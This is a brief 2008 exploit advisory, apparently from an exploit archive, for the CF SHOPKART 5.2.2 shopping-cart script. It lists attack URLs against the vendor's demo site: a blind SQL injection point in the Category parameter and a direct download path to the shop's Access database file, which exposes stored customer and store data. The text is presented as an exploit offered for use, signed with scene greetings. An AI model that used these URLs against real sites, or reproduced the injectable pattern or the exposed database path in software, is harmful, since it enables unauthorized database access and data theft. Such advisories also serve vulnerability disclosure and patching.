id: 4407
date: 12/10/2008
title: CF SHOPKART 5.2.2 (SQL/DD) Multiple Remote Vulnerabilities
author: AlpHaNiX
cves: 

==========================================================
CF SHOPKART 5.2.2 (SQL/DD) Multiple Remote Vulnerabilities
==========================================================


###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX

###########################################################################

#script   : CF SHOPKART V5.2.2
#download : http://www.cfshopkart.com/dl/cfshopkart522.rar
#Demo     : http://www.cfshopkart.com/demos/cfshopkart522/

###########################################################################

#Exploits :

--=[BLIND SQL INJECTION]=--
http://www.cfshopkart.com/demos/cfshopkart522/index.cfm?carttoken=86347665727815&Action=ViewCategory&Category=(bl!nd)


--=[DATABASE DISCLOSURE]=--
http://www.cfshopkart.com/demos/cfshopkart522/databases/cfshopkart52.mdb

#Greetz For DraGoBalti`

###########################################################################



#  0day.today [2023-03-23]  #